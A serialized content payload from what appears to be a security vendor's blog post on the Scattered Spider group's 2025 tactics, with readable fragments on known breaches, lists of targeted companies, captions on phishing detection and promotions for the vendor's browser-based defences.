317,"linkType":318},[],{"nodeType":178,"data":120140,"content":120141},{},[120142],{"nodeType":173,"value":104382,"marks":120143,"data":120144},[],{},{"nodeType":312,"data":120146,"content":120149},{"target":120147},{"sys":120148},{"id":104389,"type":317,"linkType":318},[],{"nodeType":178,"data":120151,"content":120152},{},[120153,120156,120163],{"nodeType":173,"value":104395,"marks":120154,"data":120155},[],{},{"nodeType":186,"data":120157,"content":120158},{"uri":104400},[120159],{"nodeType":173,"value":104403,"marks":120160,"data":120162},[120161],{"type":194},{},{"nodeType":173,"value":60235,"marks":120164,"data":120165},[],{},{"nodeType":235,"data":120167,"content":120168},{},[120169],{"nodeType":173,"value":104414,"marks":120170,"data":120172},[120171],{"type":370},{},{"nodeType":178,"data":120174,"content":120175},{},[120176,120179,120186],{"nodeType":173,"value":104422,"marks":120177,"data":120178},[],{},{"nodeType":186,"data":120180,"content":120181},{"uri":989},[120182],{"nodeType":173,"value":992,"marks":120183,"data":120185},[120184],{"type":194},{},{"nodeType":173,"value":104433,"marks":120187,"data":120188},[],{},{"nodeType":235,"data":120190,"content":120191},{},[120192],{"nodeType":173,"value":104440,"marks":120193,"data":120195},[120194],{"type":370},{},{"nodeType":178,"data":120197,"content":120198},{},[120199],{"nodeType":173,"value":104448,"marks":120200,"data":120201},[],{},{"nodeType":178,"data":120203,"content":120204},{},[120205],{"nodeType":173,"value":104455,"marks":120206,"data":120207},[],{},{"nodeType":231,"data":120209,"content":120210},{},[],{"nodeType":169,"data":120212,"content":120213},{},[120214],{"nodeType":173,"value":104465,"marks":120215,"data":120217},[120216],{"type":370},{},{"nodeType":178,"data":120219,"content":120220},{},[120221],{"nodeType":173,"value":104473,"marks":120222,"data":120223},[],{},{"nodeType":312,"data":120225,"content":120228},{"target":120226},{"sys":120227},{"id":104480,"type":317,"linkType":318},[],{"nodeType":178,"data":120230,"content":120231},{},[120232],{"nodeType":173,"value":104486,"marks":120233,"data":120234},[],{},{"nodeType":235,"data":120236,"content":120237},{},[120238],{"nodeType":173,"value":104493,"marks":120239,"data":120241},[120240],{"type":370},{},{"nodeType":178,"data":120243,"content":120244},{},[120245,120248,120255],{"nodeType":173,"value":37,"marks":120246,"data":120247},[],{},{"nodeType":186,"data":120249,"content":120250},{"uri":104400},[120251],{"nodeType":173,"value":104507,"marks":120252,"data":120254},[120253],{"type":194},{},{"nodeType":173,"value":104512,"marks":120256,"data":120257},[],{},{"nodeType":178,"data":120259,"content":120260},{},[120261],{"nodeType":173,"value":104519,"marks":120262,"data":120263},[],{},{"nodeType":312,"data":120265,"content":120268},{"target":120266},{"sys":120267},{"id":98333,"type":317,"linkType":318},[],{"nodeType":235,"data":120270,"content":120271},{},[120272],{"nodeType":173,"value":104531,"marks":120273,"data":120275},[120274],{"type":370},{},{"nodeType":178,"data":120277,"content":120278},{},[120279],{"nodeType":173,"value":104539,"marks":120280,"data":120281},[],{},{"nodeType":178,"data":120283,"content":120284},{},[120285],{"nodeType":173,"value":104546,"marks":120286,"data":120287},[],{},{"nodeType":178,"data":120289,"content":120290},{},[120291,120294,120301,120304,120311],{"nodeType":173,"value":104553,"marks":120292,"data":120293},[],{},{"nodeType":186,"data":120295,"content":120296},{"uri":14287},[120297],{"nodeType":173,"value":104560,"marks":120298,"data":120300},[120299],{"type":194},{},{"nodeType":173,"value":104565,"marks":120302,"data":120303},[],{},{"nodeType":186,"data":120305,"content":120306},{"uri":81553},[120307],{"nodeType":173,"value":104572,"marks":120308,"data":120310},[120309],{"type":194},{},{"nodeType":173,"value":104577,"marks":120312,"data":120313},[],{},{"nodeType":312,"data":120315,"content":120318},{"target":120316},{"sys":120317},{"id":104584,"type":317,"linkType":318},[],{"nodeType":178,"data":120320,"content":120321},{},[120322],{"nodeType":173,"value":104590,"marks":120323,"data":120324},[],{},{"nodeType":235,"data":120326,"content":120327},{},[120328],{"nodeType":173,"value":104597,"marks":120329,"data":120331},[120330],{"type":370},{},{"nodeType":178,"data":120333,"content":120334},{},[120335],{"nodeType":173,"value":104605,"marks":120336,"data":120337},[],{},{"nodeType":312,"data":120339,"content":120342},{"target":120340},{"sys":120341},{"id":69626,"type":317,"linkType":318},[],{"nodeType":178,"data":120344,"content":120345},{},[120346,120349,120356,120359,120366],{"nodeType":173,"value":104617,"marks":120347,"data":120348},[],{},{"nodeType":186,"data":120350,"content":120351},{"uri":104622},[120352],{"nodeType":173,"value":104625,"marks":120353,"data":120355},[120354],{"type":194},{},{"nodeType":173,"value":104630,"marks":120357,"data":120358},[],{},{"nodeType":186,"data":120360,"content":120361},{"uri":61655},[120362],{"nodeType":173,"value":8091,"marks":120363,"data":120365},[120364],{"type":194},{},{"nodeType":173,"value":104641,"marks":120367,"data":120368},[],{},{"nodeType":235,"data":120370,"content":120371},{},[120372],{"nodeType":173,"value":104648,"marks":120373,"data":120375},[120374],{"type":370},{},{"nodeType":178,"data":120377,"content":120378},{},[120379,120382,120389],{"nodeType":173,"value":104656,"marks":120380,"data":120381},[],{},{"nodeType":186,"data":120383,"content":120384},{"uri":104661},[120385],{"nodeType":173,"value":104664,"marks":120386,"data":120388},[120387],{"type":194},{},{"nodeType":173,"value":104669,"marks":120390,"data":120391},[],{},{"nodeType":178,"data":120393,"content":120394},{},[120395],{"nodeType":173,"value":104676,"marks":120396,"data":120397},[],{},{"nodeType":312,"data":120399,"content":120402},{"target":120400},{"sys":120401},{"id":104683,"type":317,"linkType":318},[],{"nodeType":235,"data":120404,"content":120405},{},[120406],{"nodeType":173,"value":104689,"marks":120407,"data":120409},[120408],{"type":370},{},{"nodeType":178,"data":120411,"content":120412},{},[120413,120416,120423],{"nodeType":173,"value":104697,"marks":120414,"data":120415},[],{},{"nodeType":186,"data":120417,"content":120418},{"uri":97747},[120419],{"nodeType":173,"value":104704,"marks":120420,"data":120422},[120421],{"type":194},{},{"nodeType":173,"value":104709,"marks":120424,"data":120425},[],{},{"nodeType":178,"data":120427,"content":120428},{},[120429],{"nodeType":173,"value":104716,"marks":120430,"data":120431},[],{},{"nodeType":250,"data":120433,"content":120434},{},[120435,120444,120453,120462,120471,120480],{"nodeType":254,"data":120436,"content":120437},{},[120438],{"nodeType":178,"data":120439,"content":120440},{},[120441],{"nodeType":173,"value":104729,"marks":120442,"data":120443},[],{},{"nodeType":254,"data":120445,"content":120446},{},[120447],{"nodeType":178,"data":120448,"content":120449},{},[120450],{"nodeType":173,"value":104739,"marks":120451,"data":120452},[],{},{"nodeType":254,"data":120454,"content":120455},{},[120456],{"nodeType":178,"data":120457,"content":120458},{},[120459],{"nodeType":173,"value":104749,"marks":120460,"data":120461},[],{},{"nodeType":254,"data":120463,"content":120464},{},[120465],{"nodeType":178,"data":120466,"content":120467},{},[120468],{"nodeType":173,"value":104759,"marks":120469,"data":120470},[],{},{"nodeType":254,"data":120472,"content":120473},{},[120474],{"nodeType":178,"data":120475,"content":120476},{},[120477],{"nodeType":173,"value":104769,"marks":120478,"data":120479},[],{},{"nodeType":254,"data":120481,"content":120482},{},[120483],{"nodeType":178,"data":120484,"content":120485},{},[120486],{"nodeType":173,"value":104779,"marks":120487,"data":120488},[],{},{"nodeType":312,"data":120490,"content":120493},{"target":120491},{"sys":120492},{"id":104786,"type":317,"linkType":318},[],{"nodeType":231,"data":120495,"content":120496},{},[],{"nodeType":169,"data":120498,"content":120499},{},[120500],{"nodeType":173,"value":104795,"marks":120501,"data":120503},[120502],{"type":370},{},{"nodeType":178,"data":120505,"content":120506},{},[120507],{"nodeType":173,"value":104803,"marks":120508,"data":120509},[],{},{"nodeType":178,"data":120511,"content":120512},{},[120513],{"nodeType":173,"value":104810,"marks":120514,"data":120515},[],{},{"nodeType":178,"data":120517,"content":120518},{},[120519,120522,120529,120532,120539],{"nodeType":173,"value":104817,"marks":120520,"data":120521},[],{},{"nodeType":186,"data":120523,"content":120524},{"uri":104822},[120525],{"nodeType":173,"value":104825,"marks":120526,"data":120528},[120527],{"type":194},{},{"nodeType":173,"value":104830,"marks":120530,"data":120531},[],{},{"nodeType":186,"data":120533,"content":120534},{"uri":81553},[120535],{"nodeType":173,"value":104837,"marks":120536,"data":120538},[120537],{"type":194},{},{"nodeType":173,"value":197,"marks":120540,"data":120541},[],{},{"nodeType":231,"data":120543,"content":120544},{},[],{"nodeType":169,"data":120546,"content":120547},{},[120548],{"nodeType":173,"value":104851,"marks":120549,"data":120551},[120550],{"type":370},{},{"nodeType":178,"data":120553,"content":120554},{},[120555],{"nodeType":173,"value":104859,"marks":120556,"data":120558},[120557],{"type":370},{},{"nodeType":312,"data":120560,"content":120563},{"target":120561},{"sys":120562},{"id":104867,"type":317,"linkType":318},[],{"nodeType":235,"data":120565,"content":120566},{},[120567],{"nodeType":173,"value":104873,"marks":120568,"data":120569},[],{},{"nodeType":178,"data":120571,"content":120572},{},[120573],{"nodeType":173,"value":104880,"marks":120574,"data":120576},[120575],{"type":370},{},{"nodeType":312,"data":120578,"content":120581},{"target":120579},{"sys":120580},{"id":104888,"type":317,"linkType":318},[],{"nodeType":178,"data":120583,"content":120584},{},[120585],{"nodeType":173,"value":104894,"marks":120586,"data":120587},[],{},{"nodeType":178,"data":120589,"content":120590},{},[120591],{"nodeType":173,"value":104901,"marks":120592,"data":120593},[],{},{"nodeType":312,"data":120595,"content":120598},{"target":120596},{"sys":120597},{"id":98287,"type":317,"linkType":318},[],{"nodeType":235,"data":120600,"content":120601},{},[120602],{"nodeType":173,"value":104913,"marks":120603,"data":120604},[],{},{"nodeType":178,"data":120606,"content":120607},{},[120608],{"nodeType":173,"value":104920,"marks":120609,"data":120611},[120610],{"type":370},{},{"nodeType":178,"data":120613,"content":120614},{},[120615],{"nodeType":173,"value":104928,"marks":120616,"data":120617},[],{},{"nodeType":178,"data":120619,"content":120620},{},[120621],{"nodeType":173,"value":104935,"marks":120622,"data":120623},[],{},{"nodeType":235,"data":120625,"content":120626},{},[120627],{"nodeType":173,"value":104942,"marks":120628,"data":120629},[],{},{"nodeType":178,"data":120631,"content":120632},{},[120633,120637,120642],{"nodeType":173,"value":104949,"marks":120634,"data":120636},[120635],{"type":370},{},{"nodeType":173,"value":104954,"marks":120638,"data":120641},[120639,120640],{"type":194},{"type":370},{},{"nodeType":173,"value":104960,"marks":120643,"data":120645},[120644],{"type":370},{},{"nodeType":178,"data":120647,"content":120648},{},[120649,120652,120659],{"nodeType":173,"value":104968,"marks":120650,"data":120651},[],{},{"nodeType":186,"data":120653,"content":120654},{"uri":104973},[120655],{"nodeType":173,"value":21642,"marks":120656,"data":120658},[120657],{"type":194},{},{"nodeType":173,"value":1477,"marks":120660,"data":120661},[],{},{"nodeType":178,"data":120663,"content":120664},{},[120665],{"nodeType":173,"value":104986,"marks":120666,"data":120667},[],{},{"nodeType":178,"data":120669,"content":120670},{},[120671],{"nodeType":173,"value":104993,"marks":120672,"data":120673},[],{},{"nodeType":312,"data":120675,"content":120678},{"target":120676},{"sys":120677},{"id":105000,"type":317,"linkType":318},[],{"nodeType":235,"data":120680,"content":120681},{},[120682],{"nodeType":173,"value":105006,"marks":120683,"data":120684},[],{},{"nodeType":178,"data":120686,"content":120687},{},[120688],{"nodeType":173,"value":105013,"marks":120689,"data":120691},[120690],{"type":370},{},{"nodeType":178,"data":120693,"content":120694},{},[120695],{"nodeType":173,"value":105021,"marks":120696,"data":120697},[],{},{"nodeType":178,"data":120699,"content":120700},{},[120701],{"nodeType":173,"value":105028,"marks":120702,"data":120703},[],{},{"nodeType":312,"data":120705,"content":120708},{"target":120706},{"sys":120707},{"id":105035,"type":317,"linkType":318},[],{"nodeType":235,"data":120710,"content":120711},{},[120712],{"nodeType":173,"value":105041,"marks":120713,"data":120714},[],{},{"nodeType":178,"data":120716,"content":120717},{},[120718],{"nodeType":173,"value":105048,"marks":120719,"data":120721},[120720],{"type":370},{},{"nodeType":178,"data":120723,"content":120724},{},[120725],{"nodeType":173,"value":105056,"marks":120726,"data":120727},[],{},{"nodeType":178,"data":120729,"content":120730},{},[120731],{"nodeType":173,"value":105063,"marks":120732,"data":120733},[],{},{"nodeType":178,"data":120735,"content":120736},{},[120737],{"nodeType":173,"value":105070,"marks":120738,"data":120739},[],{},{"nodeType":312,"data":120741,"content":120744},{"target":120742},{"sys":120743},{"id":105077,"type":317,"linkType":318},[],{"nodeType":235,"data":120746,"content":120747},{},[120748],{"nodeType":173,"value":105083,"marks":120749,"data":120750},[],{},{"nodeType":178,"data":120752,"content":120753},{},[120754],{"nodeType":173,"value":105090,"marks":120755,"data":120757},[120756],{"type":370},{},{"nodeType":178,"data":120759,"content":120760},{},[120761],{"nodeType":173,"value":105098,"marks":120762,"data":120763},[],{},{"nodeType":178,"data":120765,"content":120766},{},[120767,120770,120777],{"nodeType":173,"value":105105,"marks":120768,"data":120769},[],{},{"nodeType":186,"data":120771,"content":120772},{"uri":4342},[120773],{"nodeType":173,"value":835,"marks":120774,"data":120776},[120775],{"type":194},{},{"nodeType":173,"value":105116,"marks":120778,"data":120779},[],{},{"nodeType":312,"data":120781,"content":120784},{"target":120782},{"sys":120783},{"id":105123,"type":317,"linkType":318},[],{"nodeType":235,"data":120786,"content":120787},{},[120788],{"nodeType":173,"value":105129,"marks":120789,"data":120790},[],{},{"nodeType":178,"data":120792,"content":120793},{},[120794,120797,120805],{"nodeType":173,"value":101248,"marks":120795,"data":120796},[],{},{"nodeType":186,"data":120798,"content":120799},{"uri":9152},[120800],{"nodeType":173,"value":101255,"marks":120801,"data":120804},[120802,120803],{"type":194},{"type":370},{},{"nodeType":173,"value":101261,"marks":120806,"data":120807},[],{},{"nodeType":312,"data":120809,"content":120812},{"target":120810},{"sys":120811},{"id":9179,"type":317,"linkType":318},[],{"nodeType":178,"data":120814,"content":120815},{},[120816],{"nodeType":173,"value":101273,"marks":120817,"data":120818},[],{},{"nodeType":178,"data":120820,"content":120821},{},[120822,120825,120832],{"nodeType":173,"value":101289,"marks":120823,"data":120824},[],{},{"nodeType":186,"data":120826,"content":120827},{"uri":101294},[120828],{"nodeType":173,"value":101297,"marks":120829,"data":120831},[120830],{"type":194},{},{"nodeType":173,"value":101302,"marks":120833,"data":120834},[],{},{"nodeType":312,"data":120836,"content":120839},{"target":120837},{"sys":120838},{"id":101326,"type":317,"linkType":318},[],{"nodeType":231,"data":120841,"content":120842},{},[],{"nodeType":169,"data":120844,"content":120845},{},[120846],{"nodeType":173,"value":18605,"marks":120847,"data":120849},[120848],{"type":370},{},{"nodeType":178,"data":120851,"content":120852},{},[120853],{"nodeType":173,"value":98309,"marks":120854,"data":120855},[],{},{"nodeType":178,"data":120857,"content":120858},{},[120859,120862,120868],{"nodeType":173,"value":61741,"marks":120860,"data":120861},[],{},{"nodeType":186,"data":120863,"content":120864},{"uri":98320},[120865],{"nodeType":173,"value":1472,"marks":120866,"data":120867},[],{},{"nodeType":173,"value":1477,"marks":120869,"data":120870},[],{},{"entries":120872},{"hyperlink":120873,"inline":120874,"block":120875},[],[],[120876,120906,120932,120960,120964,120978,121013,121027,121041,121049,121053,121060,121064,121068,121075,121080,121094,121100,121107,121112,121120,121127,121130],{"sys":120877,"__typename":5311,"content":120878,"name":102961,"title":118},{"id":100724},{"json":120879},{"nodeType":165,"data":120880,"content":120881},{},[120882],{"nodeType":178,"data":120883,"content":120884},{},[120885,120888,120894,120897,120903],{"nodeType":173,"value":102936,"marks":120886,"data":120887},[],{},{"nodeType":186,"data":120889,"content":120890},{"uri":39735},[120891],{"nodeType":173,"value":102943,"marks":120892,"data":120893},[],{},{"nodeType":173,"value":102947,"marks":120895,"data":120896},[],{},{"nodeType":186,"data":120898,"content":120899},{"uri":39735},[120900],{"nodeType":173,"value":102954,"marks":120901,"data":120902},[],{},{"nodeType":173,"value":102958,"marks":120904,"data":120905},[],{},{"sys":120907,"__typename":5311,"content":120908,"name":120931,"title":118},{"id":103959},{"json":120909},{"nodeType":165,"data":120910,"content":120911},{},[120912],{"nodeType":178,"data":120913,"content":120914},{},[120915,120919,120927],{"nodeType":173,"value":120916,"marks":120917,"data":120918},"With criminal hacker collectives being fluid in nature, Scattered Spider has also been associated with ",[],{},{"nodeType":186,"data":120920,"content":120921},{"uri":819},[120922],{"nodeType":173,"value":120923,"marks":120924,"data":120926},"the Snowflake attacks",[120925],{"type":194},{},{"nodeType":173,"value":120928,"marks":120929,"data":120930}," attributed to the ShinyHunters group, which resulted in hundreds of millions of breached records from 9 public victims including AT&T, Ticketmaster, and Santander (with the full impact suggested to be around 165 organizations), monetized through ransom payments, extortion of individual victims, and resale of the data on criminal forums.",[],{},"Scattered Spider insight box 0",{"sys":120933,"__typename":5311,"content":120934,"name":120959,"title":118},{"id":104044},{"json":120935},{"nodeType":165,"data":120936,"content":120937},{},[120938],{"nodeType":178,"data":120939,"content":120940},{},[120941,120946,120950,120955],{"nodeType":173,"value":120942,"marks":120943,"data":120945},"Caesars",[120944],{"type":370},{},{"nodeType":173,"value":120947,"marks":120948,"data":120949}," was also hit at the same time as MGM Resorts. Less is known about the Caesars attack, except that a ransom of ",[],{},{"nodeType":173,"value":120951,"marks":120952,"data":120954},"$15M",[120953],{"type":370},{},{"nodeType":173,"value":120956,"marks":120957,"data":120958}," was paid to Scattered Spider in an attempt to prevent stolen data being leaked online.",[],{},"Scattered Spider insight box 1",{"sys":120961,"__typename":15269,"type":15270,"ctaText":120962,"buttonLabel":120963,"buttonColour":15273,"buttonUrl":102966},{"id":104076},"Want to learn more from our security researchers? Watch our webinar on Scattered Spider's 2025 TTPs here. ","Stream On-Demand",{"sys":120965,"__typename":5311,"content":120966,"name":120977,"title":118},{"id":104100},{"json":120967},{"nodeType":165,"data":120968,"content":120969},{},[120970],{"nodeType":178,"data":120971,"content":120972},{},[120973],{"nodeType":173,"value":120974,"marks":120975,"data":120976},"It's worth thinking about Scattered Spider less as a neatly identified group of individuals, but more as a pattern of activity and behaviors. For this reason, it's unlikely that arrests will have a definitive impact — the TTPs exhibited will continue to be used and refined by newcomers.  ",[],{},"Scattered Spider TTPs Insight Box 5",{"sys":120979,"__typename":5311,"content":120980,"name":121012,"title":118},{"id":104335},{"json":120981},{"nodeType":165,"data":120982,"content":120983},{},[120984],{"nodeType":178,"data":120985,"content":120986},{},[120987,120991,120998,121002,121009],{"nodeType":173,"value":120988,"marks":120989,"data":120990},"Learn more about how Scattered Spider conducts help desk attacks ",[],{},{"nodeType":186,"data":120992,"content":120993},{"uri":1034},[120994],{"nodeType":173,"value":120995,"marks":120996,"data":120997},"in our recent blog pos",[],{},{"nodeType":173,"value":120999,"marks":121000,"data":121001},"t or by checking out ",[],{},{"nodeType":186,"data":121003,"content":121004},{"uri":102966},[121005],{"nodeType":173,"value":121006,"marks":121007,"data":121008},"our on-demand webinar — available to stream now",[],{},{"nodeType":173,"value":2340,"marks":121010,"data":121011},[],{},"Scattered Spider TTPs insight box 6",{"sys":121014,"__typename":5311,"content":121015,"name":121026,"title":118},{"id":104376},{"json":121016},{"nodeType":165,"data":121017,"content":121018},{},[121019],{"nodeType":178,"data":121020,"content":121021},{},[121022],{"nodeType":173,"value":121023,"marks":121024,"data":121025},"Accenture, Aflac, Allstate, Ally Bank, Amica, Apple, AT&T, Athene, Audemars Piguet, Ballet Crypto, BCB Group, Bell, Bitcoin Suisse, Blockdaemon, Blockstream, Charter Communications, Chik-fil-A, Cincinnati Financial, Comcast Corporation, Core Scientific, Costco, Credit Karma, DoorDash, Fireblocks, Forbes, Gemini, Grayscale, H&R Block, Hanover Insurance, Harrow Health, Iliad, Instacart, Jackson Hewitt, Kemper, Louis Vuitton, Luno, Marsh, Mercury, Morningstar, Mutual of Omaha, Nansen, NGRAVE, New York Digital Investment Group, New York Life Insurance, News Corporation, Nike, Orange, P.F. Chang’s, Paxos, PNC Bank, Revolut, RiteAid, 7-Eleven, Singtel, Stargate Industries, Synchrony Bank, Synovus, T-Mobile, Telstra, TIAA, Transamerica, Twitter/X, UScellular, Verizon, Vodafone, WINDTRE, and Xapo Bank.",[],{},"Scattered Spider insight box 3",{"sys":121028,"__typename":5311,"content":121029,"name":121040,"title":118},{"id":104389},{"json":121030},{"nodeType":165,"data":121031,"content":121032},{},[121033],{"nodeType":178,"data":121034,"content":121035},{},[121036],{"nodeType":173,"value":121037,"marks":121038,"data":121039},"ActiveCampaign, Ada CX, Alchemy, Asurion, Bandwith, Bird CRM, Campaign Monitor, Concentrix, Constant Contact, Corporate Tools, CTS, eClerx, Expedia Group, FalconX, FICO, Five9, Foundever, Freshworks, Genesis Trading, Givebutter, GoDaddy, HubSpot, Incode, Intercom, iQor, Iterable, Jumio, Klaviyo, LinkedIn, Mixpanel, Nuance Communications, Onfido, OnSolve, Podium, Pure Storage, Ripple, Roblox, Salesforce, Shipbob, Sinch, Socure, SPOC, Squarespace, TaskUs, TriVista, Twilio, Ulta Beauty, Upland Software, Wix, Workday, Ziff Davis, and 247[.]ai.",[],{},"Scattered Spider insight box 4",{"sys":121042,"__typename":5345,"title":121043,"caption":121044,"layoutMode":118,"file":121045},{"id":104480},"Scattered Spider image 1","Summary of Scattered Spider TTP evolution in the context of an end-to-end attack chain.",{"url":121046,"width":121047,"height":121048},"https://images.ctfassets.net/y1cdw1ablpvd/16ngVb8CXbn6jnv7CNeCs5/1d708ddda20413c228d1239f6739acae/Screenshot_2025-06-27_at_15.30.27.png",3376,1876,{"sys":121050,"__typename":15269,"type":15270,"ctaText":121051,"buttonLabel":64975,"buttonColour":15273,"buttonUrl":121052},{"id":98333},"Frustrated that phishing attacks are still so successful in 2025? Check out on-demand latest webinar where we analyze exactly why and where controls are failing.","https://pushsecurity.com/resources/phishing-2025",{"sys":121054,"__typename":5345,"title":121055,"caption":121056,"layoutMode":118,"file":121057},{"id":104584},"Scattered spider image 2","Comparing the it.com domain observed by security researchers with the us.com observed in our recent Onfido malvertising investigation.",{"url":121058,"width":5358,"height":121059},"https://images.ctfassets.net/y1cdw1ablpvd/36YNp6VD5QfqcFcB4actyT/e31cc1dad9f55d49e1d793711199a666/image1.png",791,{"sys":121061,"__typename":5434,"title":121062,"arcadeDemoUrl":121063,"playText":27947},{"id":69626},"Evilginx demo","https://demo.arcade.software/2OpOz9hyjfIu5o8KtAmI?embed",{"sys":121065,"__typename":5434,"title":121066,"arcadeDemoUrl":121067,"playText":27947},{"id":104683},"Phishing Toolkit Detection Evasion Arcade","https://demo.arcade.software/tDUPQV1Nlaralf6VQHT2?embed",{"sys":121069,"__typename":5345,"title":121070,"caption":121071,"layoutMode":118,"file":121072},{"id":104786},"Scattered spider image 3","Scattered Spider Okta phishing pages impersonating various brands",{"url":121073,"width":121074,"height":5358},"https://images.ctfassets.net/y1cdw1ablpvd/7HWejTJs8g5dtoZLK2oqg7/72e3461a28811d0b80d6322f2f93a431/image3.png",1645,{"sys":121076,"__typename":5345,"title":121077,"caption":121078,"layoutMode":118,"file":121079},{"id":104867},"Push vs Scattered Spider","Push controls mapped against Scattered Spider TTPs.",{"url":103001,"width":5358,"height":102972},{"sys":121081,"__typename":5311,"content":121082,"name":121093,"title":118},{"id":104888},{"json":121083},{"nodeType":165,"data":121084,"content":121085},{},[121086],{"nodeType":178,"data":121087,"content":121088},{},[121089],{"nodeType":173,"value":121090,"marks":121091,"data":121092},"To detect modern, sophisticated phishing kits like those used by Scattered Spider, organizations need to be able to detect and block phishing pages in real-time. Push’s browser-based approach intercepts phishing attacks as they happen — in employee browsers. Being in the browser delivers a lot of advantages when it comes to detecting and intercepting phishing attacks. You see the live webpage that the user sees, as they see it, meaning you have much better visibility of malicious elements running on the page. It also means that you can implement real-time controls that kick in when a malicious element is detected.",[],{},"Scattered Spider insight box 2",{"sys":121095,"__typename":5345,"title":121096,"caption":121097,"layoutMode":118,"file":121098},{"id":98287},"Phishing toolkit detection","Accessing pages running malicious phishing toolkits is automatically blocked. ",{"url":121099,"width":23880,"height":19654},"https://images.ctfassets.net/y1cdw1ablpvd/3ylgW0MDCCesBjQsoqjD4P/a8bc4df9a430aca6c725f913d2bc6444/image11.png",{"sys":121101,"__typename":5345,"title":121102,"caption":121103,"layoutMode":118,"file":121104},{"id":105000},"Scattered spider image 4","Push detects and blocks when a password is used on a site it doesn't belong to.",{"url":121105,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/3DsbAAM2GCMbyfBdENebFJ/89978c80fe97b46d2e80089b19d8cb73/image8.png",1920,{"sys":121108,"__typename":5345,"title":121109,"caption":121109,"layoutMode":118,"file":121110},{"id":105035},"Detecting stolen sessions running on attacker machines. ",{"url":121111,"width":23880,"height":100678},"https://images.ctfassets.net/y1cdw1ablpvd/3Pp4bDB2FkGlHbOEt35j0j/49a92cf3c2f805850eff23bacd43818c/image8.png",{"sys":121113,"__typename":5345,"title":121114,"caption":121115,"layoutMode":118,"file":121116},{"id":105077},"Detecting stolen credentials in lastpass","Push shows where stolen credentials have been used to log into an account and the source of the leak",{"url":121117,"width":121118,"height":121119},"https://images.ctfassets.net/y1cdw1ablpvd/HYlWtjgQJdjOYgjmRVMf3/2444a1804ff5c75e88884d75c8735aa8/image8.png",697,668,{"sys":121121,"__typename":5345,"title":121122,"caption":121123,"layoutMode":118,"file":121124},{"id":105123},"Scattered spider image 5","Push identifies where multiple login methods are configured for a single account, as well as when the method was last observed, to surface ghost logins.",{"url":121125,"width":5358,"height":121126},"https://images.ctfassets.net/y1cdw1ablpvd/4LigZHBdaNgpK4vXjr80Ct/5c904257035d6507eff924bff131ced9/image5.png",887,{"sys":121128,"__typename":5345,"title":32278,"caption":32279,"layoutMode":118,"file":121129},{"id":9179},{"url":32281,"width":32282,"height":32283},{"sys":121131,"__typename":15269,"type":15270,"ctaText":103013,"buttonLabel":103014,"buttonColour":15273,"buttonUrl":101294},{"id":101326},"content:blog:scattered-spider-ttp-evolution-in-2025.json","blog/scattered-spider-ttp-evolution-in-2025.json","blog/scattered-spider-ttp-evolution-in-2025",{"_path":121136,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":121137,"ogImage":118,"summary":121139,"title":98341,"subtitle":118,"metaTitle":121150,"synopsis":98342,"hashTags":118,"publishedDate":98343,"slug":98344,"tagsCollection":121151,"relatedBlogPostsCollection":121157,"authorsCollection":122747,"content":122751,"_id":123360,"_type":5439,"_source":5440,"_file":123361,"_stem":123362,"_extension":5439},"/blog/three-reasons-why-browser-is-best-for-stopping-phishing-attacks",{"id":97694,"publishedAt":121138},"2026-01-30T09:16:16.547Z",{"json":121140},{"data":121141,"content":121142,"nodeType":165},{},[121143],{"data":121144,"content":121145,"nodeType":178},{},[121146],{"data":121147,"marks":121148,"value":121149,"nodeType":173},{},[],"Why being in the browser gives defenders a key advantage over network- and email-based phishing prevention, detection, and response tools. ","Three reasons why browser is best for stopping phishing",{"items":121152},[121153,121155],{"sys":121154,"name":509},{"id":508},{"sys":121156,"name":505},{"id":504},{"items":121158},[121159,121577,122355],{"__typename":1528,"sys":121160,"content":121161,"title":69761,"synopsis":69762,"hashTags":118,"publishedDate":69763,"slug":69764,"tagsCollection":121567,"authorsCollection":121573},{"id":69294},{"json":121162},{"nodeType":165,"data":121163,"content":121164},{},[121165,121172,121178,121184,121189,121195,121200,121206,121212,121215,121222,121228,121234,121255,121261,121264,121271,121284,121289,121295,121300,121306,121312,121315,121322,121338,121343,121349,121354,121357,121364,121380,121385,121391,121396,121412,121417,121422,121425,121432,121438,121444,121449,121452,121459,121465,121471,121474,121481,121487,121493,121498,121504,121534,121539,121546,121552],{"nodeType":169,"data":121166,"content":121167},{},[121168],{"nodeType":173,"value":24096,"marks":121169,"data":121171},[121170],{"type":370},{},{"nodeType":178,"data":121173,"content":121174},{},[121175],{"nodeType":173,"value":69310,"marks":121176,"data":121177},[],{},{"nodeType":178,"data":121179,"content":121180},{},[121181],{"nodeType":173,"value":69317,"marks":121182,"data":121183},[],{},{"nodeType":312,"data":121185,"content":121188},{"target":121186},{"sys":121187},{"id":63196,"type":317,"linkType":318},[],{"nodeType":178,"data":121190,"content":121191},{},[121192],{"nodeType":173,"value":69329,"marks":121193,"data":121194},[],{},{"nodeType":312,"data":121196,"content":121199},{"target":121197},{"sys":121198},{"id":69336,"type":317,"linkType":318},[],{"nodeType":178,"data":121201,"content":121202},{},[121203],{"nodeType":173,"value":69342,"marks":121204,"data":121205},[],{},{"nodeType":178,"data":121207,"content":121208},{},[121209],{"nodeType":173,"value":69349,"marks":121210,"data":121211},[],{},{"nodeType":231,"data":121213,"content":121214},{},[],{"nodeType":169,"data":121216,"content":121217},{},[121218],{"nodeType":173,"value":69359,"marks":121219,"data":121221},[121220],{"type":370},{},{"nodeType":178,"data":121223,"content":121224},{},[121225],{"nodeType":173,"value":69367,"marks":121226,"data":121227},[],{},{"nodeType":178,"data":121229,"content":121230},{},[121231],{"nodeType":173,"value":69374,"marks":121232,"data":121233},[],{},{"nodeType":250,"data":121235,"content":121236},{},[121237,121246],{"nodeType":254,"data":121238,"content":121239},{},[121240],{"nodeType":178,"data":121241,"content":121242},{},[121243],{"nodeType":173,"value":69387,"marks":121244,"data":121245},[],{},{"nodeType":254,"data":121247,"content":121248},{},[121249],{"nodeType":178,"data":121250,"content":121251},{},[121252],{"nodeType":173,"value":69397,"marks":121253,"data":121254},[],{},{"nodeType":178,"data":121256,"content":121257},{},[121258],{"nodeType":173,"value":69404,"marks":121259,"data":121260},[],{},{"nodeType":231,"data":121262,"content":121263},{},[],{"nodeType":169,"data":121265,"content":121266},{},[121267],{"nodeType":173,"value":69414,"marks":121268,"data":121270},[121269],{"type":370},{},{"nodeType":178,"data":121272,"content":121273},{},[121274,121277,121281],{"nodeType":173,"value":69422,"marks":121275,"data":121276},[],{},{"nodeType":173,"value":8046,"marks":121278,"data":121280},[121279],{"type":370},{},{"nodeType":173,"value":69430,"marks":121282,"data":121283},[],{},{"nodeType":312,